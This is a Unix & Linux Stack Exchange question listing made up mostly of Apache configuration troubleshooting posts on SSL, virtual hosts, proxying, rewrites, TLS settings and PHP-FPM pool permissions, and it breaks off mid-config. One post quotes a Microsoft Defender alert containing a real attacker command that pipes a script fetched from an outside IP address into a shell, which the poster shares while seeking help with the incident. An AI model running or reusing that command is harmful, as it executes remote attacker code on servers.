
Unix & Linux Stack Exchange

Q&A for users of Linux, FreeBSD and other Unix-like operating systems

Latest Questions

2 votes
1 answers
5065 views
Apache SSL configuration Connection refused connect:errno=111
I am trying to configure SSL on an old opensuse server:

```
openSUSE 11.4 (x86_64)
VERSION = 11.4
CODENAME = Celadon
```

I enabled the apache SSL module:

```
apache2ctl -M
Loaded Modules:
 core_module (static)
 mpm_prefork_module (static)
 http_module (static)
 so_module (static)
 actions_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_file_module (shared)
 authz_host_module (shared)
 authz_groupfile_module (shared)
 authz_default_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 cgi_module (shared)
 dir_module (shared)
 env_module (shared)
 expires_module (shared)
 include_module (shared)
 log_config_module (shared)
 mime_module (shared)
 negotiation_module (shared)
 setenvif_module (shared)
 ssl_module (shared)
 userdir_module (shared)
 php5_module (shared)
 reqtimeout_module (shared)
 deflate_module (shared)
 headers_module (shared)
 rewrite_module (shared)
Syntax OK
```

And configured the virtual host providing the SSL certificates (by copying and editing the vhost-ssl.template and renaming it https.xxxxxxxx.conf) and restarted apache. When I try to connect I get this error:

```
openssl s_client -connect localhost:443
connect: Connection refused
connect:errno=111
```

This is the openssl version installed:

```
OpenSSL 1.0.1p 9 Jul 2015 (Library: OpenSSL 1.0.0c 2 Dec 2010)
```

If it can help this is my iptables config:

```
iptables -L -vn
Chain INPUT (policy ACCEPT 4641 packets, 815K bytes)
 pkts bytes target prot opt in out source destination
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
 pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 1691 packets, 4745K bytes)
 pkts bytes target prot opt in out source destination
```

Can you help me understand why I am not able to connect in localhost to the 443 port?

EDIT: I believe it is a problem with apache and the additional https.xxxxxxx.conf file:

```
httpd2 -S
VirtualHost configuration:
wildcard NameVirtualHosts and _default_ servers:
*:80 is a NameVirtualHost
 default server xxxxxxxx.it (/etc/apache2/vhosts.d/xxxxxxxx.conf:3)
 port 80 namevhost xxxxxxxx.it (/etc/apache2/vhosts.d/xxxxxxxx.it.conf:3)
 port 80 namevhost XXX.XXX.XXX.XXX (/etc/apache2/vhosts.d/xxxxxxxx.it.conf:9)
```

In my listen.conf it seems that if the SSL module is enabled it should Listen 443:

```
Listen 80
Listen 443
```

This is the output of netstat:

```
netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 8105/mysqld
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1847/sshd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2179/master
tcp 0 0 :::80 :::* LISTEN 13330/httpd2-prefor
tcp 0 0 :::21 :::* LISTEN 1930/vsftpd
tcp 0 0 :::22 :::* LISTEN 1847/sshd
tcp 0 0 ::1:25 :::* LISTEN 2179/master
```

I have modified the /etc/sysconfig/apache2 file to turn on the SSL module

```
APACHE_SERVER_FLAGS="SSL"
```

Now it seems to respond correctly both locally and remotely:

```
openssl s_client -connect localhost:443
CONNECTED(00000003)
depth=3 C = SE, O = AddTrust AB, OU = AddTrust External TTP Network, CN = AddTrust External CA Root
verify return:1
```

I still have problems since I get from the browser:

> This site can’t be reached xxxxxxxx.it unexpectedly closed the connection. Try: Checking the connection Checking the proxy and the firewall Running Network Diagnostics ERR_CONNECTION_CLOSED

However I believe the problem is not related
Niko Zarzani (163 rep)
May 30, 2018, 10:33 AM • Last activity: Aug 1, 2025, 10:03 AM
2 votes
1 answers
1887 views
Basic Apache2 vhost configuration doesn't work
I have a little problem with my virtual host configuration on Apache2.

Context: I have a Raspberry Pi with Apache2 installed. I want to access to my test directory in: "/var/www/html/test". So I modified my 000-default.conf in "/etc/apache2/sites-available" like this and this worked:

```
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
NameVirtualHost 192.168.1.29:80
ServerName raspyvan
DocumentRoot /var/www/html/test
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
```

*(raspyvan is my servername on my router and host file)*

But I would deny the access with IP address "192.168.1.29". So I modified in a second time my 000-default.conf file like this:

```
Listen 192.168.1.29:80
ServerName DefaultServer
DocumentRoot /var/www/html
NameVirtualHost 192.168.1.29:80
ServerName 192.168.1.29
Deny from all
ServerName raspyvan
DocumentRoot /var/www/test
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
```

Now the problem is that the access by IP and hostname are denied and I don't know why.

Edit: My nameserver is apply on the DNS router config and hosts apache file.
Yvan (21 rep)
Nov 23, 2016, 08:19 PM • Last activity: Jul 14, 2025, 08:04 AM
1 votes
3 answers
6463 views
Multiple virtual host in Centos 7 is not working together
My server information is

```
Server version: Apache/2.4.6 (CentOS)
Server built: Nov 19 2015 21:43:13
```

I am trying to configure virtual host for 2 different sites: biz.example.com and pin.example.com which are hosted on the same server. There are 2 different folders located under 'var/www/html/' named 'biz' and 'pin' with their respected project files for the above mentioned 2 websites. I am trying to configure it on the below way.

Within /etc/hosts below configuration

```
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
xxx.xxx.xxx.xxx biz.example.com
xxx.xxx.xxx.xxx pin.example.com
```

xxx.xxx.xxx.xxx is replaced by the server IP address.

Within /etc/httpd/conf/httpd.conf

```
IncludeOptional sites-enabled/*.conf
```

Now, under /etc/httpd/sites-available there are biz.conf and pin.conf file. I also have the folder sites-enabled under /etc/httpd which has 2 files that points to the biz.conf and pin.conf of sites-available folder using the below command

```
ln -s /etc/httpd/sites-available/biz.conf /etc/httpd/sites-enabled/biz.conf
ln -s /etc/httpd/sites-available/pin.conf /etc/httpd/sites-enabled/pin.conf
```

biz.conf has the followings

```
ServerName http://biz.example.com/
ServerAlias http://biz.example.com/
DocumentRoot "/var/www/html/biz"
Options Indexes FollowSymLinks
AllowOverride all
Order Deny,Allow
Allow from 127.0.0.1
```

And the configuration within pin.conf file is mentioned as

```
ServerName http://pin.example.com/
ServerAlias http://pin.example.com/
DocumentRoot "/var/www/html/pin"
Options Indexes FollowSymLinks
AllowOverride all
Order Deny,Allow
Allow from 127.0.0.1
```

On this setup, if I try to access http://biz.example.com/ , the correct website (biz website) is loading. But if I try to access http://pin.example.com/ , then also biz website is loading instead of pin website. Multiple configuration is not working together.
I also tried to merge the virtual configuration of biz.conf and pin.conf within a single file, biz.conf, but it didn't work as well.
Debashis (111 rep)
Dec 16, 2016, 11:38 AM • Last activity: Jul 8, 2025, 02:07 PM
0 votes
1 answers
3967 views
Apache HTTPD does not list all files in directory
```
Server version: Apache/2.4.6 (CentOS)
Server built: Nov 16 2020 16:18:20
```

When I go to browser and type IP/result I do not see all the files in directory.

```
Alias /result "/var/geojson"
Options +Indexes
AllowOverride None
Order allow,deny
Allow from all
Require all granted
```
user435421 (103 rep)
Oct 7, 2021, 01:10 PM • Last activity: May 25, 2025, 10:01 PM
1 votes
1 answers
3549 views
Apache redirect certain url or subdomain to internal ip
I have a gitlab server next to my web server running on my home network. On my web server I run Apache2 with some domains. One of them is example.com. Now my aim is that the user receives the gitlab login page when visiting something like example.com/gitlab or gitlab.example.com. Actually I do not care whether the redirection happens from a certain url or a subdomain. I've already tried quite much but nothing of this worked for me (probably I did it wrong all times). I also read some related forum posts like

- https://unix.stackexchange.com/questions/349218/use-apache-virtual-host-to-redirect-a-subdomain-to-internal-ip-preserving-passed
- https://unix.stackexchange.com/questions/209300/use-apaches-name-based-virtual-host-to-redirect-to-internal-ip
- https://www.linuxquestions.org/questions/linux-server-73/apache-redirect-to-internal-server-919321/
- ...

But I didn't get anything up and running. My *default.conf* is configured that it always redirects Port 80 to Port 443 (HTTPS).

```
ServerName example.com
ServerAlias www.example.com
Redirect permanent / https://www.example.com/
[...]
```

So here is my *example.com.conf* before:

```
ServerName example.com
ServerAlias www.example.com
DocumentRoot /var/www/html/example.com
SSLEngine on
SSLOptions +StdEnvVars
SSLOptions +StdEnvVars
Include /etc/letsencrypt/options-ssl-apache.conf
SSLCertificateFile /etc/letsencrypt/live/www.example.com/fullchain.pem
SSLCertificateKeyFile /etc/letsencrypt/live/www.example.com/privkey.pem
```

First I tried to redirect **from a certain url**. I added:

```
ProxyRequests Off
ProxyPass /gitlab http://192.168.0.115:80/
ProxyPassReverse /gitlab http://192.168.0.115:80/
```

This does not work completely but if I enter the url, I get *"404 The requested URL /users/sign_in was not found on this server"*. '/users/sign_in' is the path of the login page of my gitlab server, so at least something seems to work.

Strange to me is that it works if I redirect the root directory to my internal IP:

```
ProxyRequests Off
ProxyPass / http://192.168.0.113:80/
ProxyPassReverse / http://192.168.0.113:80/
```

This works but now I can't access my actual website anymore.

Then I tried redirection **from a subdomain**. I added:

```
ServerName gitlab.example.com
ProxyPass / http://192.168.0.113/
ProxyPassReverse / http://192.168.0.113/
```

But I receive *"The website is unreachable"*. I don't even get the subdomain running.
Kite (111 rep)
Jan 9, 2019, 06:09 PM • Last activity: Apr 14, 2025, 04:07 AM
0 votes
2 answers
2472 views
Error when starting httpd service "Could not reliably determine the server's fully qualified domain name using localhost.localdomain
I have been following this install for LibreNMS https://www.linuxhelp.com/how-to-install-librenms-in-centos/ . Everything has been fine until I finally started the httpd service. It spits out this error. I have a virtual host configured. This is the exact Error message:

> Could not reliably determine the server's fully qualified domain name using localhost.localdomain. Set the server name directive globally.

I'll display the virtualhost in the httpd config file below.

```
NameVirtualHost *:80
DocumentRoot /opt/librenms/html/
ServerName linuxhelp1.com
CustomLog /opt/librenms/logs/access_log combined
ErrorLog /opt/librenms/logs/error_log
AllowEncodedSlashes On
AllowOverride All
Options FollowSymLinks MultiViews
```
LeGreen95 (1 rep)
Jan 17, 2018, 07:52 PM • Last activity: Apr 10, 2025, 08:04 AM
0 votes
0 answers
825 views
Site does not exist for a2ensite
During the koha installation process I told ubuntu to
sudo a2ensite library
and got the message
ERROR: Site library does not exist!
I looked it up and found here that I might have to [rename the file](https://stackoverflow.com/questions/20591889/site-does-not-exist-error-for-a2ensite) . So I used
sudo mv /etc/apache2/sites-available/library /etc/apache2/sites-available/library.conf
and got
mv: cannot stat '/etc/apache2/sites-available/library': No such file or directory
Any ideas how to solve the problem? I use ubuntu 22.04 for desktop.
paulin_0097 (1 rep)
Mar 21, 2023, 01:27 PM • Last activity: Mar 20, 2025, 12:11 PM
-1 votes
1 answers
5435 views
Certbot gives an error for apache2
I tried to configure SSL using this guide: https://www.digitalocean.com/community/tutorials/how-to-secure-apache-with-let-s-encrypt-on-ubuntu-22-04

But I get this error:

```
serv_ivan@964889-cd87180:~$ sudo certbot --apache
[sudo] password for serv_ivan:
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Which names would you like to activate HTTPS for?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
1: vardidze.ru
2: www.vardidze.ru
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Select the appropriate numbers separated by commas and/or spaces, or leave input blank to select all options shown (Enter 'c' to cancel):
Requesting a certificate for vardidze.ru and www.vardidze.ru
Certbot failed to authenticate some domains (authenticator: apache). The Certificate Authority reported these problems:
Domain: vardidze.ru
Type: unauthorized
Detail: 94.228.120.106: Invalid response from http://vardidze.ru/.well-known/acme-challenge/3_vZwseS0tgfCsIJYvlU91atg-lEkdzvQZ58W-rJH98 : 403
Hint: The Certificate Authority failed to verify the temporary Apache configuration changes made by Certbot. Ensure that the listed domains point to this Apache server and that it is accessible from the internet.
Some challenges have failed.
Ask for help or search for solutions at https://community.letsencrypt.org . See the logfile /var/log/letsencrypt/letsencrypt.log or re-run Certbot with -v for more details.
```

Although my domain is available: www.vardidze.ru

Help me please.
Алекс Шевцов (39 rep)
Jul 26, 2022, 11:31 PM • Last activity: Aug 26, 2024, 01:02 AM
0 votes
0 answers
49 views
Help needed with .htaccess
I have a website which needs to be changed from Nginx to Apache webserver. The index directory is nl.html but the HTML extension is removed from the address bar. If I visit the website example.com it shows in the address bar the following URL: example.com/nl but actually it's nl.html. At the moment I have the following .htaccess
RewriteEngine On
RewriteCond %{REQUEST_URI} \.html$
RewriteRule ^(.*)\.html$ $1 [R=301,L]
When I visit the website the root URL is shown without the /nl. If I visit /nl/blog it shows a 404 but it should show /nl/blog.html. The issue also appears on other files. What am I missing here?
Noob (161 rep)
Jun 25, 2024, 08:07 PM • Last activity: Jun 25, 2024, 08:52 PM
9 votes
2 answers
56650 views
Allow access to Apache on both port 80 and 443 in Ubuntu 16.04
I've just installed UFW 0.35 on Ubuntu 16.04:

```
root@localhost:/etc# ufw --version
ufw 0.35
Copyright 2008-2015 Canonical Ltd.
```

and

```
root@localhost:/etc# ufw app list
Available applications:
  OpenSSH
```

I would like to allow access to Apache on both port 80 and 443, with the command

```
$ ufw allow "Apache Full"
```

but I got an error

```
ERROR: Could not find a profile matching 'Apache Full'
```
en Peris (361 rep)
Aug 4, 2018, 08:53 AM • Last activity: May 13, 2024, 02:53 PM
1 votes
2 answers
518 views
Redirect unhandled routes to / in apache 2.4 and CentOS 7
A CentOS 7 server hosts a public front end web site at example.com, and also hosts a backend API at home.example.com. The VirtualHost records below successfully direct requests for example.com to the front end while directing requests for the backend to home.example.com. However, requests for arbitrary requests to paths on example.com are given 404 errors.

>**What specific changes need to be made to the VirtualHost config below so that requests to example.com/anyPath get redirected to example.com?**

For example, a request for http://example.com/home that reaches the server should be returned with example.com

Here is the VirtualHost:

```
ServerName www.example.com
ServerAlias example.com
ErrorLog /var/log/httpd/example_com_error.log
CustomLog /var/log/httpd/example_com_requests.log combined
DocumentRoot /var/www/example/public_html

ServerName home.example.com
ErrorLog /var/log/httpd/example_home_com_error.log
CustomLog /var/log/httpd/example_home_com_requests.log combined
ProxyPass / http://public.ip.for.api:1234/ connectiontimeout=5 timeout=30
```
CodeMed (5357 rep)
Jul 13, 2017, 08:04 PM • Last activity: Mar 4, 2024, 03:36 AM
1 votes
0 answers
105 views
Getting Microsoft defender for cloud "Suspicious process executed by a network service" alerts for CentOS Linux
I am an Azure Consultant and I am getting Microsoft Defender for cloud "Suspicious process executed by a network service" alerts for CentOS Linux. Environment: Tomcat Apache running on CentOS Linux 7.9.0 The Defender alert details are as follows:
1/6/2024 9:11:14 PM 
  java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Command line /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre//bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Process id 7402
Image file path /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java
Image file SHA1 2bffb1d3d46365ca0e78f96577123814b54dbe88
Image file last modification time May 15, 2023 8:25:05 PM
Image file java
Effective user tomcat
1/6/2024 9:11:14 PM 
  bash /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt  |sh"
Command line /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt  |sh"
Process id 7402
Image file path /usr/bin/bash
Image file SHA1 9ad737cbd8bbdddc96726156dbd3bc03936bf02f
Image file last modification time Nov 24, 2021 10:03:27 PM
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Image file bash
Effective user tomcat
Referenced in commandline http://222.108.161.27:7070/docs/da.txt 
Referenced in commandline 222.108.161.27
1/6/2024 9:11:14 PM 
 bash was executed by a network service 'java'
Script content cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt  |sh
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Suspicious process executed by a network service New Detected High
I need help understanding the above alert details. Is the process happening inside CentOS itself or is it suspicious activity?
Toran Vaishnav (11 rep)
Jan 19, 2024, 05:24 AM • Last activity: Jan 19, 2024, 07:45 AM
0 votes
1 answers
62 views
How am I not calling /index.cgi?
root@technoluddites:/etc/apache2/sites-enabled# uname -a
Linux technoluddites.org 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
root@technoluddites:/etc/apache2/sites-enabled# apachectl -v
Server version: Apache/2.4.38 (Debian)
Server built:   2019-10-15T19:53:42
I am trying to configure a site as a URL shortener. With exceptions, I am trying to get http://cjsh.name/foo to redirect to https://cjsh.name/?foo , and have an index.cgi that looks and sees if it has an entry for foo, and if not, redirect to https://cjshayward.com/foo . I tried to modify /index.cgi to log diagnostics to a file that isn't being opened; the beginning of /index.cgi reads:
#!/usr/bin/python

import cgi
import commands
import cPickle
import os
import re
import sys

ADMIN_URL = u'/wp-content/protected/refer_url.cgi'
CHARACTERS = \
  u'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890' + \
  u'=+/,!$*'
DEFAULT_LOCATION = u'https://CJSHayward.com/ '
DEBUG_LOG = u'/tmp/cjsh.name.error'
debug = open(DEBUG_LOG, 'w')
/tmp/cjsh.name.error is never being created, and an ls -ltu on the CGI script lists the time I last accessed the file from the command line, and not a time a few minutes later when I tried to load http://cjsh.name/pstv , which should hit a defined key in the dictionary and load https://cjshayward.com/positive/ . The HTTP site's Apache config file runs:
ServerAdmin cjshayward@pobox.com
        DocumentRoot /home/christos/books
        ServerName cjsh.name
        ServerAlias cjsh.cjshayward.com www.cjsh.name books.cjsh.name
        LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" combined
        CustomLog /home/christos/logs/cjsh.name combined
        ErrorLog /home/christos/logs/cjsh.name.error
        RewriteEngine onhttps://www.zazzle.com/a_definion_of_the_autism_spectrum_t_shirt-235926361009257586  [R=301,L]
        RewriteRule ^/99.?[Pp][Aa][Gg][Ee].*$ https://smile.amazon.com/C-J-S-Hayward-Under-99-Pages/dp/B09H8SLCZP?_encoding=UTF8&qid=1632850210&sr=8-1&linkCode=ll1&tag=jonascorn-20&linkId=fffe9ae168e721fbc006f4096100e772&language=en_US&ref_=as_li_ss_tl  [R=301,L]
        RewriteRule ^/phone\/?\.?% https://www.amazon.com/How-Take-Life-Back-Phone/dp/B0BHS7LQJV/ref=sr_1_1?crid=C9EYO4DANH6I&keywords=cjs+hayward+how+can+i+take+my+life+back+from+my+phone&qid=1670093200&sprefix=cjs+hayward+how+can+i+take+my+life+back+from+my+phonCapsC115&sr=8-1%23editorialReviews_feature_div  [R=301,L]
        RewriteRule ^/([^\?].*)$ /?$1 [R=301,L]
        RewriteRule ^/$ https://cjshayward.com  [R=301,L]
        
            Options ExecCGI Indexes FollowSymLinks MultiViews
            AllowOverride None
            Order allow,deny
            allow from all
The HTTPS site's entry is:
ServerAdmin cjshayward@pobox.com
        DocumentRoot /home/christos/cjsh.name
        ServerName cjsh.name
        ServerAlias cjsh.cjshayward.com www.cjsh.name books.cjsh.name
        LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" combined
        CustomLog /home/christos/logs/cjsh.name combined
        ErrorLog /home/christos/logs/cjsh.name.error
        RewriteEngine on
        RewriteRule ^/best.(.*)$ https://cjshayward.com/wp-content/cgi/download-ebook.cgi?book=The+Best+of+Jonathan%27s+Corner.$2  [R=301,L]
        RewriteRule ^/99.?[Pp][Aa][Gg][Ee].*$ https://smile.amazon.com/C-J-S-Hayward-Under-99-Pages/dp/B09H8SLCZP?_encoding=UTF8&qid=1632850210&sr=8-1&linkCode=ll1&tag=jonascorn-20&linkId=fffe9ae168e721fbc006f4096100e772&language=en_US&ref_=as_li_ss_tl  [R=301,L]
        RewriteRule ^/phone\/?\.?% https://www.amazon.com/How-Take-Life-Back-Phone/dp/B0BHS7LQJV/ref=sr_1_1?crid=C9EYO4DANH6I&keywords=cjs+hayward+how+can+i+take+my+life+back+from+my+phone&qid=1670093200&sprefix=cjs+hayward+how+can+i+take+my+life+back+from+my+phonCapsC115&sr=8-1%23editorialReviews_feature_div  [R=301,L]
        RewriteRule ^/([^\?].*)$ /?$1 [R=301,L]
        RewriteRule ^/$ https://cjshayward.com  [R=301,L]
        
            Options ExecCGI Indexes FollowSymLinks MultiViews
            AllowOverride None
            Order allow,deny
            allow from all
        
SSLCertificateFile /etc/letsencrypt/live/cjsh.name-0002/fullchain.pem
SSLCertificateKeyFile /etc/letsencrypt/live/cjsh.name-0002/privkey.pem
Include /etc/letsencrypt/options-ssl-apache.conf
In my main apache2.conf file I have:
DirectoryIndex index.cgi index.php index.shtml index.html
I am attempting to access the site via Firefox (119.0.1) on a Mac (12.6.9), and close all tabs to my site(s) and delete all browsing history forever to get a clean slate. Attempts to access http://cjsh.name/pstv are redirecting to https://cjshayward.com/?pstv (this is and should be a 404 page), and I have restarted Apache since touching the sites-enabled file. I also tried pulling http://cjsh.name/pstv for a first time from Safari, and Safari is behaving exactly like Firefox, i.e. redirecting to https://cjshayward.com/?pstv .

How am I directing fresh calls to http://cjsh.name/pstv to https://cjshayward.com/?pstv (and https://cjsh.name/?pstv to https://cjshayward.com/?pstv) ? How should I be changing either or both of the Apache files or other setup so that the index.cgi is called, looks up the "right of the initial question mark" data, and redirects to (in this case) https://cjshayward.com/positive/ ?

--UPDATE--

I shot myself in the foot by having cjsh.name ServerAliased in an earlier entry and that was producing the behavior I originally reported. However, the new difference in behavior is that trying to load http://cjsh.name/pstv loads https://cjshayward.com/?pstv instead of https://cjshayward.com/positive/ . That happens to load the homepage rather than a 404 at https://cjshayward.com/pstv , but it is still an error and my homepage does not load the page at https://cjshayward.com/positive/ .

Thanks,
Christos Hayward (529 rep)
Nov 15, 2023, 07:39 PM • Last activity: Nov 17, 2023, 02:53 PM
0 votes
0 answers
2032 views
Disable TLSv1.0 and TLSv1.1 using httpd CentOS7
I'm trying to disable TLS 1.0/1.1 for PCI Compliance, but having problems. Running CentOS 7 / Apache 2.4.6. The Server is setup with multiple hosts. All the documentation I've found is similar but nothing seems to work.

In /etc/httpd/conf.d (it currently has set)

```
SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1
```

Also in the /etc/httpd/sitnamefqdn.conf (specific for the domain)

```
SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1
```

And just because I've read this about letsencrypt (even though not active) /etc/letsencrypt/options-ssl-apache.conf

```
SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1
```

I have restarted httpd, and rebooted just to make sure, nothing seems to take. If you use the site: https://www.ssllabs.com/ssltest I'm still getting..

```
This server is vulnerable to the POODLE attack. If possible, disable SSL 3 to mitigate. Grade capped to C.
This server accepts RC4 cipher, but only with older protocols. Grade capped to B.
This server does not support Forward Secrecy with the reference browsers. Grade capped to B.
This server supports TLS 1.0 and TLS 1.1. Grade capped to B.

Protocols
TLS 1.3 No
TLS 1.2 Yes
TLS 1.1 Yes
TLS 1.0 Yes
SSL 3 INSECURE Yes
SSL 2 No
```
TexasTim (23 rep)
Nov 1, 2023, 01:32 AM • Last activity: Nov 1, 2023, 03:30 AM
0 votes
1 answers
4679 views
CentOS 7 Linking sites in Apache conf folders without using a2ensite and a2dissite
I'm following this guide to create virtualhosts in my server, but my apache is running on CentOS 7, and I do not have the a2ensite command required at point 5. What's the equivalent centos command for the command the guide uses at point 5?

```
sudo a2dissite 000-default.conf
sudo a2ensite ostechnix1.lan.conf
sudo a2ensite ostechnix2.lan.conf
```
Kodeeo (241 rep)
Jun 28, 2019, 03:44 PM • Last activity: Sep 26, 2023, 04:05 AM
6 votes
1 answers
6283 views
Apache + php-fpm: Proper permissions for per-pool, per-user projects?
What is the correct way to set up Apache virtualhosts and PHP-FPM pools with different users, one user per project, so that

- each user/project is independent from each other in file access
- projects using normal Apache / `www-data` can not access the pooled projects?

I have a setup where I'm using Apache with virtualhosts, and I want to set up each virtualhost with their own `php-fpm` pool:

* Apache virtualhost `site1.conf`:

```

        DocumentRoot /var/www/site1/public

        
            Options Indexes FollowSymLinks
            AllowOverride All
            Require all granted
        

	
        # 2.4.10+ can proxy to unix socket
        SetHandler "proxy:unix:/run/php/php-fpm.site1.sock|fcgi://localhost/"
```

* PHP pool for `site1`:

```
[site1]
user = site1
group = site1
listen.owner = site1
listen.group = www-data
listen.mode = 0660
```

* The directory starting at `/var/www/site1`:

```
drwxr-xr-x 15 site1 site1 4,0K ago 31 11:48 .
drwxr-xr-x 15 site1 site1 4,0K ago 31 11:48 public
```

* And the user:

```
id site1
uid=1007(site1) gid=1007(site1) grupos=1007(site1),33(www-data)
```

Ditto other configuration files for virtualhost `site2`, changing where adequate.

----

Now, this configuration works and all files are served, but it's too open for what it's intended. For starters, the files and directories in the public area of `site1` have to be served with **world-readable** permission (eg.: `rwxr--r-- site1 site1 file`). If I make the file readable only for `site1` as it should be, I get HTTP 403 and `EACCESS` errors everywhere. I understand that at some point Apache has to have access to the files, but I thought the entire purpose of a FPM pool was to take care of that access. This also means that, unless project users set up their `umask` adequately, new files they create might not have the adequate permissions and they must be made world-readable by hand before the webserver (or FPM?) can access them.

I thought that one potential solution would be to make the `www-data` user, which runs Apache, a member of `site1` (`site2`, etc...), but that would give other projects running on Apache full access to the project files anyway, including non-front facing elements such as Laravel config, backend connectors, etc. So in theory this doesn't work.

A second option would be to set up each project's `public` directory with either `www-data` setgid or with a read directive for `www-data` via ACL (`setfacl`) to make them readable by Apache's user specifically, but I'm not sure if that's doable without first giving Apache full path access to read the project, since in Linux a directory path is only readable if *all* its parent paths are. It could work, but I'm not entirely sure what is the corresponding setup.

The only other option I could see would be to set up Apache itself so that the different virtualhosts are run with their own users, but I've found no usable documentation about such setups. The closest I've found is something called `apache2-mpm-itk` which advertises this capability, but I've found no usable configuration that actually lets an Apache service *start* while this module is enabled. In fact, the default configuration for itk in a Debian 9 machine right out segfaults Apache once started.

What am I missing here to achieve the correct configuration? I take it it *has* to be possible, at least I assume that's how any normal web hoster does it.
Luis Machuca (502 rep)
Sep 2, 2020, 09:04 PM • Last activity: Jun 22, 2023, 08:00 AM
0 votes
0 answers
125 views
DNS record configuration to work with server blocks and virtual hosts
What is the correct DNS configuration for multiple subdomain names, so that they will work with nginx server blocks and/or Apache virtual hosts?

Example:

Server IP Address: 192.0.2.0

Main/primary subdomain name: vegetable.example.com

Other subdomain names to be served by this rig:

- artichoke.example.com
- bean.example.com
- carrot.example.com

How to properly configure the DNS records to work with Apache virtual hosts or nginx server blocks?

- A record?
- CNAME?
- Alias?
kmiklas (161 rep)
Apr 13, 2023, 06:58 PM
2 votes
0 answers
269 views
PHP-FPM + Apache2 security
My question is almost identical to Luis Machuca's from 2 years ago (Apache + php-fpm: Proper permissions for per-pool, per-user projects?), but with some additional conditions.

I have also configured the server (mine is an Ubuntu 22.04 machine) so that it is managed by Apache (v2.4.55) and php7.4-fpm. The current configuration allows every vhost to be divided into specific php-fpm pools, and each of these pools running with different users.

Everything works fine, but security related only to users to control permissions (or based on open_basedir) cannot stop shell_exec (which I need) from accessing, for example, configuration files inside /etc, or doing an ls -l /var/. What I would like, therefore, is a way to prevent a user from being able to go around and view Linux's standard folders. I don't want to get to the point of making calls like:

```
setfacl -Rm u:user_site1:--- /;
setfacl -Rm d:u:user_site1:--- /;
```

and then authorizing each fundamental folder one by one. It seems too messy.

I had therefore thought of using chroot inside each pool, but I was not able to do so because there was always a problem related to paths, AH01071: Got error 'Primary script unknown', and all online solutions say to modify the ProxyPassMatch call based on port 9000, but I use SetHandler with sockets and I don't want to change this setting.

What are the possible techniques? Do I really have to install SELinux?

Below, I am adding my configurations to better understand the situation.

/etc/apache2/sites-enabled/www.site.com.conf

```
	Protocols h2 h2c http/1.1
	H2Direct on
	ServerAdmin server@site.com
	ServerName www.site.com
	DocumentRoot /var/www/vhosts/www.site.com/httpdocs
	ErrorLog /var/www/vhosts/www.site.com/log/error.log
	CustomLog /var/www/vhosts/www.site.com/log/access.log combined

		SetHandler "proxy:unix:/run/php/php7.4-fpm-www_site_com.sock|fcgi://localhost"


	Protocols h2 h2c http/1.1
	H2Direct on
	ServerAdmin server@site.com
	ServerName www.site.com
	DocumentRoot /var/www/vhosts/www.site.com/httpdocs
	ErrorLog /var/www/vhosts/www.site.com/log/error_ssl.log
	CustomLog /var/www/vhosts/www.site.com/log/access_ssl.log combined
